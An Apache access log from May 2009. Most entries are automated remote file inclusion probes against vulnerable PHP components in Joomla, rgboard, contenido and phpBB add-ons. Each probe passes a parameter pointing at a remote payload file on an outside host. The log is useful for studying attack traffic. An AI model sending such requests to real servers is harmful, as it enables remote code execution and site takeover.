85.18.117.101 - - [30/May/2009:03:24:21 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:25:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.108 - - [30/May/2009:03:25:38 -0400] "GET /logs/access_log.Q108010300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.80.198.13 - - [30/May/2009:03:26:50 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:26:50 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:26:50 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:27:14 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:27:14 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:27:14 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:27:19 -0400] "GET /logs/access_log.Q109051800%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:27:32 -0400] "GET /logs/access_log.Q109051000//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:27:33 -0400] "GET /logs/access_log.Q109051000//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:27:52 -0400] "GET /logs/access_log.Q109051000//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:28:03 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:28:09 -0400] "GET /logs/access_log.Q109051000//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:28:13 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:28:30 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:03:28:38 -0400] "GET /errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:28:38 -0400] "GET /logs/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:28:38 -0400] "GET /logs/error_log.Q108110500/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
121.165.73.157 - - [30/May/2009:03:28:53 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:28:57 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.27.203.107 - - [30/May/2009:03:29:16 -0400] "GET /logs/error_log.Q108051600/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:03:29:21 -0400] "GET /logs/error_log.Q108051600/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
116.36.213.166 - - [30/May/2009:03:29:32 -0400] "GET /logs/access_log.Q109051100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
118.45.190.166 - - [30/May/2009:03:29:53 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:03:30:13 -0400] "GET /logs/error_log.Q108082200/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
61.81.93.142 - - [30/May/2009:03:31:14 -0400] "GET //skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:31:14 -0400] "GET /logs/access_log.Q109052300//skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:31:14 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:31:17 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.232.45.121 - - [30/May/2009:03:31:17 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
211.232.45.121 - - [30/May/2009:03:31:17 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
211.232.45.121 - - [30/May/2009:03:31:17 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:03:31:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.117.101 - - [30/May/2009:03:31:28 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.232.45.121 - - [30/May/2009:03:31:47 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
112.175.141.41 - - [30/May/2009:03:32:27 -0400] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:32:27 -0400] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:32:30 -0400] "GET /logs/access_log.Q109052300%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:32:32 -0400] "GET /logs/access_log.Q109050700%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:33:11 -0400] "GET /logs/error_log.Q108051600%20%20/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:33:18 -0400] "GET /logs/access_log.Q109051600/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:33:18 -0400] "GET /logs/access_log.Q109051800/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:03:33:40 -0400] "GET /logs/error_log.Q108082200/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:33:40 -0400] "GET /errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:03:33:40 -0400] "GET /logs/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
85.18.117.101 - - [30/May/2009:03:33:46 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:33:48 -0400] "GET /logs/error_log.Q108051600%20%20/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:33:52 -0400] "GET /logs/error_log.Q108051600%20%20/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:03:34:01 -0400] "GET /logs/error_log.Q108110500/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
116.36.213.166 - - [30/May/2009:03:34:11 -0400] "GET /logs/error_log.Q108100200%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:35:00 -0400] "GET /logs/error_log.Q108100200%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:35:46 -0400] "GET /logs/access_log.Q109052300%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:35:48 -0400] "GET /logs/access_log.Q109050700%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:36:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.10.128.219 - - [30/May/2009:03:37:47 -0400] "GET /logs/access_log.Q109051100%20%20///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:21 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:22 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:22 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 279 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:29 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:29 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:30 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:37 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 279 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:39:44 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:41:00 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:41:12 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:41:12 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:41:12 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 279 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:41:18 -0400] "GET //skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:41:18 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:41:18 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:41:22 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:41:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.249.196.70 - - [30/May/2009:03:42:07 -0400] "GET /logs/access_log.Q109051600/index.php?includepath=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
125.249.196.70 - - [30/May/2009:03:42:08 -0400] "GET /index.php?includepath=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
125.249.196.70 - - [30/May/2009:03:42:08 -0400] "GET /logs/index.php?includepath=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
85.18.117.101 - - [30/May/2009:03:42:18 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:46 -0400] "GET //skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:46 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:46 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:42:48 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:42:53 -0400] "GET /logs/access_log.Q109052300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 279 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:06 -0400] "GET //skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:06 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:06 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:43:10 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:43:38 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:43:38 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:43:38 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 279 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:43:53 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 279 "-" "Mozilla/5.0"
123.24.167.62 - - [30/May/2009:03:44:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
123.24.167.62 - - [30/May/2009:03:44:19 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
74.6.8.108 - - [30/May/2009:03:44:19 -0400] "GET /logs/access_log.Q107062100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.24.167.62 - - [30/May/2009:03:44:20 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
123.24.167.62 - - [30/May/2009:03:44:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
123.24.167.62 - - [30/May/2009:03:44:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
64.6.231.215 - - [30/May/2009:03:45:20 -0400] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.231.215 - - [30/May/2009:03:45:21 -0400] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
211.203.180.144 - - [30/May/2009:03:45:41 -0400] "GET /logs/error_log.Q108071900%20/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.59.12.99 - - [30/May/2009:03:46:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.117.101 - - [30/May/2009:03:47:08 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:47:58 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:03:48:02 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
125.249.196.70 - - [30/May/2009:03:48:03 -0400] "GET /logs/access_log.Q109052100/index.php?includepath=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
195.228.45.60 - - [30/May/2009:03:48:08 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:03:48:08 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:03:48:08 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
112.175.141.41 - - [30/May/2009:03:48:46 -0400] "GET /logs/access_log.Q109052300//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:48:46 -0400] "GET /logs/access_log.Q109050700//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:48:56 -0400] "GET /logs/error_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:49:44 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:49:44 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:03:49:44 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:50:20 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:50:20 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:50:22 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:50:36 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:50:36 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:50:38 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:51:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [30/May/2009:03:51:43 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:51:50 -0400] "GET /logs/error_log.Q108051600/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
